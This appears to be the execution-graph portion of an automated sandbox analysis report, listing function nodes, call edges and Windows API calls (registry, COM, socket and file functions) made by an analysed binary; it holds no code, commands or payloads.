                          execution_graph 107930 c9e849 107933 ca26c0 107930->107933 107932 c9e852 107934 ca273b 107933->107934 107935 d0862d 107933->107935 107940 ca2adc 107934->107940 107941 ca277c 107934->107941 107950 ca279a 107934->107950 108135 cdd520 86 API calls 4 library calls 107935->108135 107937 d0863e 108136 cdd520 86 API calls 4 library calls 107937->108136 107938 ca27cf 107938->107937 107942 ca27db 107938->107942 107939 ca2a84 108124 c9d380 107939->108124 108134 c9d349 53 API calls 107940->108134 107962 ca28f6 107941->107962 108055 c9d500 53 API calls __cinit 107941->108055 107944 ca27ef 107942->107944 107960 d0865a 107942->107960 107947 ca2806 107944->107947 107948 d086c9 107944->107948 108056 c9fa40 107947->108056 107955 c9fa40 407 API calls 107948->107955 107992 d08ac9 107948->107992 107950->107938 107950->107939 107956 ca2914 107950->107956 107957 d086ee 107955->107957 108036 c9cdb4 107956->108036 107969 ca29ec 107957->107969 107973 d0870a 107957->107973 108139 c9d89e 107957->108139 107959 ca28ac 107975 ca28cc 107959->107975 108208 c9cf97 58 API calls 107959->108208 107960->107948 107960->107969 108137 cef211 407 API calls 107960->108137 108138 cef4df 407 API calls 107960->108138 107961 d08980 108210 cdd520 86 API calls 4 library calls 107961->108210 107994 ca2900 107962->107994 108209 c9cf97 58 API calls 107962->108209 107963 ca281d 107965 ca2836 107963->107965 107963->107969 108204 c9c935 107963->108204 107970 c9fa40 407 API calls 107965->107970 107965->107992 107969->107932 107985 ca287c 107970->107985 107971 ca296e 107971->107969 107981 d08a97 107971->107981 107986 ca2984 107971->107986 107988 d089b4 107971->107988 108035 d0878d 107973->108035 108149 c9346e 48 API calls 107973->108149 107975->107962 108112 c9cf97 58 API calls 107975->108112 107977 d0883f 108202 cec235 407 API calls Mailbox 107977->108202 107980 d0882d 108188 c9ca8e 107980->108188 107981->107969 108214 c94b02 50 API calls 107981->108214 107983 d08888 107983->107963 107989 d0888c 107983->107989 107985->107959 107985->107969 107997 c9fa40 407 API calls 107985->107997 107986->107981 108113 ca41fc 84 API calls 107986->108113 108041 cebf80 107988->108041 108203 cdd520 86 API calls 4 library calls 107989->108203 108215 cdd520 86 API calls 4 library calls 107992->108215 107994->107956 107994->107961 107995 ca29b8 107998 d08a7e 107995->107998 108114 ca41fc 84 API calls 107995->108114 108004 d088ff 107997->108004 108213 caee93 84 API calls 107998->108213 107999 d08725 107999->107980 108150 ca14a0 107999->108150 108000 d089f3 108014 d08a01 108000->108014 108015 d08a42 108000->108015 108001 d08813 108008 c9d89e 50 API calls 108001->108008 108002 d087ca 108002->108001 108167 c984a6 108002->108167 108004->107969 108009 c9d89e 50 API calls 108004->108009 108007 ca29ca 108007->107969 108016 d08a6f 108007->108016 108017 ca29e5 108007->108017 108010 d08821 108008->108010 108009->107959 108012 c9d89e 50 API calls 108010->108012 108012->107980 108013 d0875d 108013->107980 108022 ca14a0 48 API calls 108013->108022 108019 c9ca8e 48 API calls 108014->108019 108020 c9d89e 50 API calls 108015->108020 108212 ced1da 50 API calls 108016->108212 108115 cb010a 108017->108115 108019->107969 108023 d08a4b 108020->108023 108025 d08775 108022->108025 108026 c9d89e 50 API calls 108023->108026 108024 d087e0 108024->108001 108187 cda76d 49 API calls 108024->108187 108028 c9d89e 50 API calls 108025->108028 108029 d08a57 108026->108029 108031 d08781 108028->108031 108211 c94b02 50 API calls 108029->108211 108030 d08807 108033 c9d89e 50 API calls 108030->108033 108034 c9d89e 50 API calls 108031->108034 108033->108001 108034->108035 108035->107977 108035->107980 108166 cd4e71 53 API calls __cinit 108035->108166 108037 c9cdca 108036->108037 108038 c9cdc5 108036->108038 108037->107971 108038->108037 108216 cb2241 48 API calls 108038->108216 108040 c9ce07 108040->107971 108047 cebfd9 _memset 108041->108047 108043 cec22e 108043->108000 108044 cec14c 108045 cec19f VariantInit VariantClear 108044->108045 108052 cec033 108044->108052 108046 cec1c5 108045->108046 108050 cec1e6 108046->108050 108046->108052 108047->108044 108048 cec097 VariantInit 108047->108048 108047->108052 108053 cec0d6 108048->108053 108218 cda6f6 103 API calls 108050->108218 108051 cec20d VariantClear 108051->108043 108219 cec235 407 API calls Mailbox 108052->108219 108053->108052 108217 cda6f6 103 API calls 108053->108217 108055->107950 108057 c9fa60 108056->108057 108092 c9fa8e Mailbox _memmove 108056->108092 108058 cb010a 48 API calls 108057->108058 108058->108092 108059 ca105e 108060 c9c935 48 API calls 108059->108060 108085 c9fbf1 Mailbox 108060->108085 108061 cb010a 48 API calls 108061->108092 108062 c9d3d2 48 API calls 108062->108092 108063 ca0119 108657 cdd520 86 API calls 4 library calls 108063->108657 108066 ca1063 108656 cdd520 86 API calls 4 library calls 108066->108656 108068 ca0dee 108070 c9d89e 50 API calls 108068->108070 108069 cb1b2a 52 API calls __cinit 108069->108092 108072 ca0dfa 108070->108072 108071 d0b772 108658 cdd520 86 API calls 4 library calls 108071->108658 108074 c9d89e 50 API calls 108072->108074 108077 ca0e83 108074->108077 108076 c9c935 48 API calls 108076->108092 108645 c9caee 108077->108645 108079 d0b7d2 108083 ca1230 108083->108085 108655 cdd520 86 API calls 4 library calls 108083->108655 108085->107963 108086 c9fa40 407 API calls 108086->108092 108089 d0b583 108653 cdd520 86 API calls 4 library calls 108089->108653 108091 ca10f1 Mailbox 108654 cdd520 86 API calls 4 library calls 108091->108654 108092->108059 108092->108061 108092->108062 108092->108063 108092->108066 108092->108068 108092->108069 108092->108071 108092->108072 108092->108076 108092->108077 108092->108083 108092->108085 108092->108086 108092->108089 108092->108091 108093 cca599 InterlockedDecrement 108092->108093 108220 c9f6d0 108092->108220 108292 ceb74b VariantInit 108092->108292 108333 cf17aa 108092->108333 108338 caf461 108092->108338 108376 cf0bfa 108092->108376 108379 cf30ad 108092->108379 108433 cadd84 108092->108433 108436 cf804e 108092->108436 108450 cf798d 108092->108450 108455 ce9122 108092->108455 108469 c950a3 108092->108469 108474 c981c6 108092->108474 108544 caef0d 108092->108544 108587 cf10e5 108092->108587 108593 ce92c0 108092->108593 108611 caf03e 108092->108611 108614 ce8065 GetCursorPos GetForegroundWindow 108092->108614 108628 ce013f 108092->108628 108641 cf1f19 108092->108641 108644 ca1620 59 API calls Mailbox 108092->108644 108649 ceee52 82 API calls 2 library calls 108092->108649 108650 ceef9d 90 API calls Mailbox 108092->108650 108651 cdb020 48 API calls 108092->108651 108652 cee713 407 API calls Mailbox 108092->108652 108093->108092 108112->107962 108113->107995 108114->108007 108118 cb0112 __calloc_impl 108115->108118 108117 cb012c 108117->107969 108118->108117 108119 cb012e std::exception::exception 108118->108119 110090 cb45ec 108118->110090 110104 cb7495 RaiseException 108119->110104 108121 cb0158 110105 cb73cb 47 API calls _free 108121->110105 108123 cb016a 108123->107969 108125 c9d38b 108124->108125 108126 c9d3b4 108125->108126 110112 c9d772 55 API calls 108125->110112 108128 c9d2d2 108126->108128 108129 c9d30a 108128->108129 108130 c9d2df 108128->108130 108129->107956 108133 c9d2e6 108130->108133 110114 c9d349 53 API calls 108130->110114 108133->108129 110113 c9d349 53 API calls 108133->110113 108134->107959 108135->107937 108136->107960 108137->107960 108138->107960 108140 c9d8ac 108139->108140 108147 c9d8db Mailbox 108139->108147 108141 c9d8ff 108140->108141 108143 c9d8b2 Mailbox 108140->108143 108142 c9c935 48 API calls 108141->108142 108142->108147 108144 c9d8c7 108143->108144 108145 d04e9b 108143->108145 108146 d04e72 VariantClear 108144->108146 108144->108147 108145->108147 110115 cca599 InterlockedDecrement 108145->110115 108146->108147 108147->107973 108149->107999 108151 ca1606 108150->108151 108154 ca14b2 108150->108154 108151->108013 108152 ca14be 108157 ca14c9 108152->108157 110117 c9346e 48 API calls 108152->110117 108154->108152 108155 cb010a 48 API calls 108154->108155 108156 d05299 108155->108156 108159 cb010a 48 API calls 108156->108159 108158 ca156d 108157->108158 108160 cb010a 48 API calls 108157->108160 108158->108013 108165 d052a4 108159->108165 108161 ca15af 108160->108161 108162 ca15c2 108161->108162 110116 cad6b4 48 API calls 108161->110116 108162->108013 108164 cb010a 48 API calls 108164->108165 108165->108152 108165->108164 108166->108002 108168 c984be 108167->108168 108182 c984ba 108167->108182 108169 d05592 __i64tow 108168->108169 108170 d05494 108168->108170 108171 c984d2 108168->108171 108178 c984ea __itow Mailbox _wcscpy 108168->108178 108172 d0557a 108170->108172 108173 d0549d 108170->108173 110118 cb234b 80 API calls 4 library calls 108171->110118 110119 cb234b 80 API calls 4 library calls 108172->110119 108173->108178 108179 d054bc 108173->108179 108175 cb010a 48 API calls 108177 c984f4 108175->108177 108181 c9caee 48 API calls 108177->108181 108177->108182 108178->108175 108180 cb010a 48 API calls 108179->108180 108183 d054d9 108180->108183 108181->108182 108182->108024 108184 cb010a 48 API calls 108183->108184 108185 d054ff 108184->108185 108185->108182 108186 c9caee 48 API calls 108185->108186 108186->108182 108187->108030 108189 c9cad0 108188->108189 108190 c9ca9a 108188->108190 108191 c9cad9 108189->108191 108192 c9cae3 108189->108192 108195 cb010a 48 API calls 108190->108195 108193 c97e53 48 API calls 108191->108193 108194 c9c4cd 48 API calls 108192->108194 108199 c9cac6 108193->108199 108194->108199 108196 c9caad 108195->108196 108197 d04f11 108196->108197 108198 c9cab8 108196->108198 108197->108199 108200 c9d3d2 48 API calls 108197->108200 108198->108199 108201 c9caee 48 API calls 108198->108201 108199->107977 108200->108199 108201->108199 108202->107983 108203->107969 108205 c9c948 108204->108205 108206 c9c940 108204->108206 108205->107965 108207 c9d805 48 API calls 108206->108207 108207->108205 108208->107975 108209->107994 108210->107969 108211->107969 108212->107998 108213->107981 108214->107992 108215->107969 108216->108040 108217->108044 108218->108051 108219->108043 108221 c9f708 108220->108221 108226 c9f77b 108220->108226 108222 d0c4d5 108221->108222 108223 c9f712 108221->108223 108228 d0c4e2 108222->108228 108229 d0c4f4 108222->108229 108224 c9f71c 108223->108224 108241 d0c544 108223->108241 108234 d0c6a4 108224->108234 108240 c9f72a 108224->108240 108287 c9f741 108224->108287 108225 c9fa40 407 API calls 108273 c9f787 108225->108273 108227 d0c253 108226->108227 108226->108273 108682 cdd520 86 API calls 4 library calls 108227->108682 108659 cef34f 108228->108659 108687 cec235 407 API calls Mailbox 108229->108687 108230 d0c585 108242 d0c590 108230->108242 108243 d0c5a4 108230->108243 108237 c9c935 48 API calls 108234->108237 108235 d0c264 108235->108092 108236 d0c507 108239 d0c50b 108236->108239 108236->108287 108237->108287 108688 cdd520 86 API calls 4 library calls 108239->108688 108240->108287 108786 cca599 InterlockedDecrement 108240->108786 108241->108230 108252 d0c569 108241->108252 108245 cef34f 407 API calls 108242->108245 108690 ced154 48 API calls 108243->108690 108245->108287 108247 d0c45a 108251 c9c935 48 API calls 108247->108251 108249 d0c7b5 108256 d0c7eb 108249->108256 108788 ceef9d 90 API calls Mailbox 108249->108788 108250 d0c5af 108263 d0c62c 108250->108263 108275 d0c5d1 108250->108275 108251->108287 108689 cdd520 86 API calls 4 library calls 108252->108689 108255 c9f84a 108260 d0c32a 108255->108260 108270 c9f854 108255->108270 108257 c9d89e 50 API calls 108256->108257 108289 c9f770 Mailbox 108257->108289 108259 d0c793 108262 c984a6 81 API calls 108259->108262 108683 c9342c 48 API calls 108260->108683 108278 d0c79b __wsetenvp 108262->108278 108713 cdafce 48 API calls 108263->108713 108264 d0c7c9 108269 c984a6 81 API calls 108264->108269 108266 c9f8bb 108266->108235 108266->108247 108266->108287 108684 cca599 InterlockedDecrement 108266->108684 108686 cef4df 407 API calls 108266->108686 108267 ca14a0 48 API calls 108272 c9f8ab 108267->108272 108268 cb2241 48 API calls 108268->108273 108282 d0c7d1 __wsetenvp 108269->108282 108270->108267 108272->108266 108276 c9f9d8 108272->108276 108273->108225 108273->108255 108273->108266 108273->108268 108273->108276 108273->108289 108691 cda485 48 API calls 108275->108691 108685 cdd520 86 API calls 4 library calls 108276->108685 108277 d0c63e 108714 cadf08 48 API calls 108277->108714 108278->108249 108280 c9d89e 50 API calls 108278->108280 108280->108249 108282->108256 108283 c9d89e 50 API calls 108282->108283 108283->108256 108284 d0c647 Mailbox 108715 cda485 48 API calls 108284->108715 108285 d0c5f6 108692 ca44e0 108285->108692 108287->108249 108287->108289 108787 ceee52 82 API calls 2 library calls 108287->108787 108289->108092 108290 d0c663 108716 ca3680 108290->108716 108293 c9ca8e 48 API calls 108292->108293 108294 ceb7a3 CoInitialize 108293->108294 108295 ceb7ae CoUninitialize 108294->108295 108296 ceb7b4 108294->108296 108295->108296 108297 ceb7d5 108296->108297 108298 c9ca8e 48 API calls 108296->108298 108299 ceb81b 108297->108299 108301 c984a6 81 API calls 108297->108301 108298->108297 108300 c984a6 81 API calls 108299->108300 108302 ceb827 108300->108302 108303 ceb7ef 108301->108303 108306 ceb9d3 SetErrorMode CoGetInstanceFromFile 108302->108306 108317 ceb861 108302->108317 109593 cca857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 108303->109593 108305 ceb802 108305->108299 108307 ceb807 108305->108307 108309 ceba1f CoGetObject 108306->108309 108310 ceba19 SetErrorMode 108306->108310 109594 cec235 407 API calls Mailbox 108307->109594 108308 ceb8a8 GetRunningObjectTable 108312 ceb8b8 108308->108312 108313 ceb8cb 108308->108313 108309->108310 108315 cebaa8 108309->108315 108330 ceb9b1 108310->108330 108312->108313 108332 ceb8ed 108312->108332 109595 cec235 407 API calls Mailbox 108313->109595 109599 cec235 407 API calls Mailbox 108315->109599 108317->108308 108321 ceb89a 108317->108321 108324 c9cdb4 48 API calls 108317->108324 108319 cebad0 VariantClear 108319->108092 108320 ceb814 Mailbox 108320->108319 108321->108308 108322 cebac2 SetErrorMode 108322->108320 108323 ceba53 108325 ceba6f 108323->108325 109597 ccac4b 51 API calls Mailbox 108323->109597 108328 ceb88a 108324->108328 109598 cda6f6 103 API calls 108325->109598 108328->108321 108329 c9cdb4 48 API calls 108328->108329 108329->108321 108330->108315 108330->108323 108332->108330 109596 ccac4b 51 API calls Mailbox 108332->109596 108334 c984a6 81 API calls 108333->108334 108335 cf17c7 108334->108335 108336 cd6f5b 63 API calls 108335->108336 108337 cf17d8 108336->108337 108337->108092 108339 caf47f 108338->108339 108340 caf48a 108338->108340 108341 c9cdb4 48 API calls 108339->108341 108343 c984a6 81 API calls 108340->108343 108374 caf498 Mailbox 108340->108374 108341->108340 108342 cb010a 48 API calls 108344 caf49f 108342->108344 108346 d06841 108343->108346 108345 caf4af 108344->108345 109600 c95080 49 API calls 108344->109600 108349 c984a6 81 API calls 108345->108349 108348 cb297d __wsplitpath 47 API calls 108346->108348 108350 d06859 108348->108350 108351 caf4bf 108349->108351 108352 c9caee 48 API calls 108350->108352 108353 c94bf9 56 API calls 108351->108353 108354 d0686a 108352->108354 108355 caf4ce 108353->108355 109607 c939e8 48 API calls 2 library calls 108354->109607 108357 d068d4 GetLastError 108355->108357 108369 caf4d6 108355->108369 108358 d068ed 108357->108358 108358->108369 109609 c94592 CloseHandle 108358->109609 108359 d06895 108361 c9cdb4 48 API calls 108359->108361 108360 d06878 108360->108359 109608 cd6f4b GetFileAttributesW FindFirstFileW FindClose 108360->109608 108361->108374 108362 d06920 108367 cb010a 48 API calls 108362->108367 108363 caf4f0 108366 cb010a 48 API calls 108363->108366 108365 d06888 108365->108359 108372 cd6d6d 52 API calls 108365->108372 108370 caf4f5 108366->108370 108371 d06925 108367->108371 108369->108362 108369->108363 109601 c9197e 108370->109601 108372->108359 108374->108342 108375 caf50a Mailbox 108374->108375 108375->108092 109610 cef79f 108376->109610 108378 cf0c0a 108378->108092 108380 c9ca8e 48 API calls 108379->108380 108381 cf30ca 108380->108381 108382 c9d3d2 48 API calls 108381->108382 108383 cf30d3 108382->108383 108384 c9d3d2 48 API calls 108383->108384 108385 cf30dc 108384->108385 108386 c9d3d2 48 API calls 108385->108386 108387 cf30e5 108386->108387 108388 c984a6 81 API calls 108387->108388 108389 cf30f4 108388->108389 108390 cf3d7b 48 API calls 108389->108390 108391 cf3128 108390->108391 108392 cf3af7 49 API calls 108391->108392 108393 cf3159 108392->108393 108394 cf319c RegOpenKeyExW 108393->108394 108395 cf3172 RegConnectRegistryW 108393->108395 108403 cf315d Mailbox 108393->108403 108397 cf31f7 108394->108397 108398 cf31c5 108394->108398 108395->108394 108395->108403 108399 c984a6 81 API calls 108397->108399 108401 cf31d9 RegCloseKey 108398->108401 108398->108403 108400 cf3207 RegQueryValueExW 108399->108400 108402 cf323e 108400->108402 108426 cf3229 108400->108426 108401->108403 108404 cf344c 108402->108404 108405 cf3265 108402->108405 108402->108426 108403->108092 108406 cb010a 48 API calls 108404->108406 108408 cf326e 108405->108408 108409 cf33d9 108405->108409 108410 cf3464 108406->108410 108407 cf34eb RegCloseKey 108407->108403 108411 cf34fe RegCloseKey 108407->108411 108413 cf338d 108408->108413 108414 cf3279 108408->108414 109707 cdad14 48 API calls _memset 108409->109707 108418 c984a6 81 API calls 108410->108418 108411->108403 108417 c984a6 81 API calls 108413->108417 108415 cf32de 108414->108415 108416 cf327e 108414->108416 108421 cb010a 48 API calls 108415->108421 108424 c984a6 81 API calls 108416->108424 108416->108426 108420 cf33a1 RegQueryValueExW 108417->108420 108422 cf3479 RegQueryValueExW 108418->108422 108419 cf33e4 108423 c984a6 81 API calls 108419->108423 108420->108426 108425 cf32f7 108421->108425 108422->108426 108432 cf3331 108422->108432 108427 cf33f6 RegQueryValueExW 108423->108427 108428 cf329f RegQueryValueExW 108424->108428 108429 c984a6 81 API calls 108425->108429 108426->108407 108427->108407 108427->108426 108428->108426 108430 cf330c RegQueryValueExW 108429->108430 108430->108426 108430->108432 108431 c9ca8e 48 API calls 108431->108426 108432->108431 109708 cadd92 GetFileAttributesW 108433->109708 109713 c919ee 108436->109713 108441 cf806f 108444 c9ca8e 48 API calls 108441->108444 108442 cf8091 108443 c9d3d2 48 API calls 108442->108443 108445 cf809a 108443->108445 108449 cf808f Mailbox 108444->108449 109739 cce2e8 108445->109739 108447 cf80aa 109756 c97bef 108447->109756 108449->108092 108451 c919ee 83 API calls 108450->108451 108452 cf799b 108451->108452 108453 c91dce 107 API calls 108452->108453 108454 cf79a4 108453->108454 108454->108092 108456 c984a6 81 API calls 108455->108456 108457 ce913f 108456->108457 108458 c9cdb4 48 API calls 108457->108458 108459 ce9149 108458->108459 109881 ceacd3 108459->109881 108461 ce9156 108462 ce915a socket 108461->108462 108466 ce9182 108461->108466 108463 ce916d WSAGetLastError 108462->108463 108464 ce9184 connect 108462->108464 108463->108466 108465 ce91a3 WSAGetLastError 108464->108465 108464->108466 109887 cdd7e4 108465->109887 108466->108092 108468 ce91b8 closesocket 108468->108466 108470 cb010a 48 API calls 108469->108470 108471 c950b3 108470->108471 108472 c950ec CloseHandle 108471->108472 108473 c950be 108472->108473 108473->108092 108475 c984a6 81 API calls 108474->108475 108476 c981e5 108475->108476 108477 c984a6 81 API calls 108476->108477 108478 c981fa 108477->108478 108479 c984a6 81 API calls 108478->108479 108480 c9820d 108479->108480 108481 c984a6 81 API calls 108480->108481 108482 c98223 108481->108482 108483 c97b6e 48 API calls 108482->108483 108484 c98237 108483->108484 108485 c9846a 108484->108485 108486 c9cdb4 48 API calls 108484->108486 108489 d0d91e 108485->108489 108490 d0d95f 108485->108490 108487 c9825e 108486->108487 108487->108485 108488 d0d752 108487->108488 108508 c98281 __wopenfile 108487->108508 108491 c93320 48 API calls 108488->108491 108493 c93320 48 API calls 108489->108493 108492 c93320 48 API calls 108490->108492 108494 d0d769 108491->108494 108495 d0d96a 108492->108495 108496 d0d928 108493->108496 108499 ca2320 50 API calls 108494->108499 108507 d0d790 108494->108507 108497 ca2320 50 API calls 108495->108497 108498 c984a6 81 API calls 108496->108498 108501 d0d985 108497->108501 108502 d0d93a 108498->108502 108499->108507 108500 c984a6 81 API calls 108503 c98306 108500->108503 108511 c984a6 81 API calls 108501->108511 108505 c980ea 48 API calls 108502->108505 108506 c984a6 81 API calls 108503->108506 108504 c980ea 48 API calls 108504->108507 108509 d0d94e 108505->108509 108510 c9831b 108506->108510 108507->108504 108512 c98182 48 API calls 108507->108512 108518 ca2320 50 API calls 108507->108518 108530 c9843f Mailbox 108507->108530 108508->108485 108508->108500 108516 d0d7ed 108508->108516 108539 c98364 108508->108539 108513 c98182 48 API calls 108509->108513 108510->108485 108515 c98342 108510->108515 108510->108516 108514 d0d9a0 108511->108514 108512->108507 108528 d0d95c 108513->108528 108517 c980ea 48 API calls 108514->108517 108519 c93320 48 API calls 108515->108519 108516->108485 108521 c93320 48 API calls 108516->108521 108520 d0d9b4 108517->108520 108518->108507 108523 c9834c 108519->108523 108524 c98182 48 API calls 108520->108524 108525 d0d84a 108521->108525 108522 ca2320 50 API calls 108522->108530 108527 c9c4cd 48 API calls 108523->108527 108524->108528 108529 ca2320 50 API calls 108525->108529 108527->108539 108528->108522 108529->108539 108530->108092 108533 d0d895 108534 d0d8ce 108533->108534 108535 d0d8bf 108533->108535 108536 c98182 48 API calls 108534->108536 109928 c9bd2f 48 API calls _memmove 108535->109928 108538 d0d8dc 108536->108538 108540 ca2320 50 API calls 108538->108540 108539->108530 108539->108533 109902 c980ea 108539->109902 109914 c98182 108539->109914 109917 ca2320 108539->109917 109927 cb247b 59 API calls 3 library calls 108539->109927 108541 d0d8ee 108540->108541 108543 c9c4cd 48 API calls 108541->108543 108543->108485 108545 c9ca8e 48 API calls 108544->108545 108546 caef25 108545->108546 108547 caeffb 108546->108547 108548 caef3e 108546->108548 108549 cb010a 48 API calls 108547->108549 109953 caf0f3 48 API calls 108548->109953 108552 caf002 108549->108552 108551 caef4d 108555 caef73 108551->108555 108556 d06942 108551->108556 108560 c9cdb4 48 API calls 108551->108560 108557 caf00e 108552->108557 109955 c95080 49 API calls 108552->109955 108554 c984a6 81 API calls 108558 caf01c 108554->108558 108559 caf03e 2 API calls 108555->108559 108556->108092 108557->108554 108562 c94bf9 56 API calls 108558->108562 108563 caef7a 108559->108563 108561 d06965 108560->108561 108561->108555 108564 d0696d 108561->108564 108565 caf02b 108562->108565 108566 d06980 108563->108566 108567 caef87 108563->108567 108568 c9cdb4 48 API calls 108564->108568 108565->108551 108569 d06936 108565->108569 108570 cb010a 48 API calls 108566->108570 108571 c9d3d2 48 API calls 108567->108571 108568->108563 108569->108556 109956 c94592 CloseHandle 108569->109956 108572 d06986 108570->108572 108573 caef8f 108571->108573 108574 d0699f 108572->108574 109957 c93d65 ReadFile SetFilePointerEx 108572->109957 109930 caf04e 108573->109930 108581 d069a3 _memmove 108574->108581 109958 cdad14 48 API calls _memset 108574->109958 108578 caef9e 108580 c97bef 48 API calls 108578->108580 108578->108581 108582 caefb2 Mailbox 108580->108582 108583 caeff2 108582->108583 108584 c950ec CloseHandle 108582->108584 108583->108092 108585 caefe4 108584->108585 109954 c94592 CloseHandle 108585->109954 108588 c984a6 81 API calls 108587->108588 108589 cf10fb LoadLibraryW 108588->108589 108590 cf110f 108589->108590 108591 cf111e 108589->108591 108590->108092 108591->108590 109982 cf28d9 48 API calls _memmove 108591->109982 108594 c9a6d4 48 API calls 108593->108594 108595 ce92d2 108594->108595 108596 c984a6 81 API calls 108595->108596 108597 ce92e1 108596->108597 108598 caf26b 50 API calls 108597->108598 108599 ce92ed gethostbyname 108598->108599 108600 ce931d _memmove 108599->108600 108601 ce92fa WSAGetLastError 108599->108601 108603 ce932d inet_ntoa 108600->108603 108602 ce930e 108601->108602 108604 c9ca8e 48 API calls 108602->108604 109983 ceadca 48 API calls 2 library calls 108603->109983 108610 ce931b Mailbox 108604->108610 108606 ce9342 109984 ceae5a 50 API calls 108606->109984 108608 ce934e 108609 c97bef 48 API calls 108608->108609 108609->108610 108610->108092 108612 caf0b5 2 API calls 108611->108612 108613 caf046 108612->108613 108613->108092 109985 ce6b19 108614->109985 108617 ce80a5 108618 c93320 48 API calls 108617->108618 108619 ce80b3 108618->108619 108620 ca2320 50 API calls 108619->108620 108623 ce80cf 108620->108623 108621 ce8102 108622 c9cdb4 48 API calls 108621->108622 108627 ce80f5 108621->108627 108624 ce812b 108622->108624 108625 ca2320 50 API calls 108623->108625 108626 c9cdb4 48 API calls 108624->108626 108624->108627 108625->108627 108626->108627 108627->108092 108629 ce015e 108628->108629 108630 ce0157 108628->108630 108631 c984a6 81 API calls 108629->108631 108632 c984a6 81 API calls 108630->108632 108631->108630 108633 ce017c 108632->108633 109990 cd76db GetFileVersionInfoSizeW 108633->109990 108635 ce018d 108636 ce0192 108635->108636 108638 ce01a3 _wcscmp 108635->108638 108637 c9ca8e 48 API calls 108636->108637 108640 ce01a1 108637->108640 108639 c9ca8e 48 API calls 108638->108639 108639->108640 108640->108092 110006 cf23c5 108641->110006 108644->108092 108646 c9cafd __wsetenvp _memmove 108645->108646 108647 cb010a 48 API calls 108646->108647 108648 c9cb3b 108647->108648 108648->108091 108649->108092 108650->108092 108651->108092 108652->108092 108653->108091 108654->108085 108655->108066 108656->108063 108657->108071 108658->108079 108789 c9d3d2 108659->108789 108661 cef3a9 108663 c9d89e 50 API calls 108661->108663 108662 cef389 Mailbox 108662->108661 108664 cef3cd 108662->108664 108665 cef3e1 108662->108665 108678 cef421 Mailbox 108663->108678 108800 c97e53 108664->108800 108666 c9c935 48 API calls 108665->108666 108668 cef3df 108666->108668 108669 cef429 108668->108669 108809 cecdb5 407 API calls 108668->108809 108794 cecd12 108669->108794 108671 cef410 108671->108669 108673 cef414 108671->108673 108810 cdd338 86 API calls 4 library calls 108673->108810 108674 cef44b 108676 cef457 108674->108676 108677 cef4a2 108674->108677 108676->108661 108680 cef476 108676->108680 108679 cef34f 407 API calls 108677->108679 108678->108287 108679->108678 108681 c9ca8e 48 API calls 108680->108681 108681->108678 108682->108235 108683->108266 108684->108266 108685->108289 108686->108266 108687->108236 108688->108289 108689->108289 108690->108250 108691->108285 108693 ca469f 108692->108693 108694 ca4537 108692->108694 108695 c9caee 48 API calls 108693->108695 108696 d07820 108694->108696 108697 ca4543 108694->108697 108704 ca45e4 Mailbox 108695->108704 109025 cee713 407 API calls Mailbox 108696->109025 108887 ca4040 108697->108887 108700 ca4639 Mailbox 108700->108287 108701 d0782c 108701->108700 109026 cdd520 86 API calls 4 library calls 108701->109026 108703 ca4559 108703->108700 108703->108701 108703->108704 108902 ce95af WSAStartup 108704->108902 108904 c950ec 108704->108904 108908 cf352a 108704->108908 108996 ce6fc3 108704->108996 108999 ce1080 108704->108999 109002 cddce9 108704->109002 109007 ce9500 108704->109007 109016 caf55e 108704->109016 108713->108277 108714->108284 108715->108290 109559 c9a9a0 108716->109559 108718 ca36e7 108719 ca3778 108718->108719 108720 d0a269 108718->108720 108784 ca3aa8 108718->108784 109571 cabc04 86 API calls 108719->109571 109576 cdd520 86 API calls 4 library calls 108720->109576 108724 d0a68d 108724->108784 109591 cdd520 86 API calls 4 library calls 108724->109591 108726 cabc5c 48 API calls 108739 ca396b Mailbox _memmove 108726->108739 108727 ca3793 108727->108724 108727->108739 108727->108784 109564 c910e8 108727->109564 108731 d0a583 108735 c9fa40 407 API calls 108731->108735 108732 d0a45c 109585 cdd520 86 API calls 4 library calls 108732->109585 108733 d0a289 108736 c9d2d2 53 API calls 108733->108736 108775 d0a3e9 108733->108775 108734 ca384e 108734->108739 108745 d0a60c 108734->108745 108746 ca38e5 108734->108746 108738 d0a5b5 108735->108738 108740 d0a2fb 108736->108740 108748 c9d380 55 API calls 108738->108748 108738->108784 108739->108726 108739->108731 108739->108732 108739->108733 108752 d0a5e6 108739->108752 108753 c9fa40 407 API calls 108739->108753 108764 c9d89e 50 API calls 108739->108764 108772 cb010a 48 API calls 108739->108772 108774 ca399f 108739->108774 108739->108784 109572 c9d500 53 API calls __cinit 108739->109572 109573 c9d420 53 API calls 108739->109573 109574 cabaef 48 API calls _memmove 108739->109574 109586 ced21a 82 API calls Mailbox 108739->109586 109587 cd89e0 53 API calls 108739->109587 109588 c9d772 55 API calls 108739->109588 108742 d0a303 108740->108742 108743 d0a40f 108740->108743 108756 d0a317 108742->108756 108757 d0a341 108742->108757 109582 cacf79 49 API calls 108743->109582 109590 cdd231 50 API calls 108745->109590 108751 cb010a 48 API calls 108746->108751 108748->108752 109589 cdd520 86 API calls 4 library calls 108752->109589 108753->108739 108755 d0a42c 108758 d0a441 108755->108758 108759 d0a44d 108755->108759 109577 cdd520 86 API calls 4 library calls 108756->109577 108765 d0a366 108757->108765 108768 d0a384 108757->108768 108764->108739 109578 cef211 407 API calls 108765->109578 108769 d0a37a 108768->108769 109579 cef4df 407 API calls 108768->109579 108769->108784 108772->108739 108776 c9c935 48 API calls 108774->108776 108777 ca39c0 108774->108777 109581 cdd520 86 API calls 4 library calls 108775->109581 108776->108777 108779 d0a65e 108777->108779 108781 ca3a05 108777->108781 108777->108784 108780 c9d89e 50 API calls 108779->108780 108780->108724 108781->108724 108782 ca3a95 108781->108782 108781->108784 108783 c9d89e 50 API calls 108782->108783 108783->108784 108785 ca3ab5 Mailbox 108784->108785 109575 cdd520 86 API calls 4 library calls 108784->109575 108785->108287 108786->108287 108787->108259 108788->108264 108790 cb010a 48 API calls 108789->108790 108791 c9d3f3 108790->108791 108792 cb010a 48 API calls 108791->108792 108793 c9d401 108792->108793 108793->108662 108795 cecd46 108794->108795 108796 cecd21 108794->108796 108795->108674 108797 c9ca8e 48 API calls 108796->108797 108798 cecd2d 108797->108798 108811 cec8b7 108798->108811 108801 c97ecf 108800->108801 108804 c97e5f __wsetenvp 108800->108804 108879 c9a2fb 108801->108879 108803 c97e85 _memmove 108803->108668 108805 c97e7b 108804->108805 108806 c97ec7 108804->108806 108875 c9a6f8 108805->108875 108878 c97eda 48 API calls 108806->108878 108809->108671 108810->108678 108813 cec914 108811->108813 108814 cec8f7 108811->108814 108869 cec235 407 API calls Mailbox 108813->108869 108814->108813 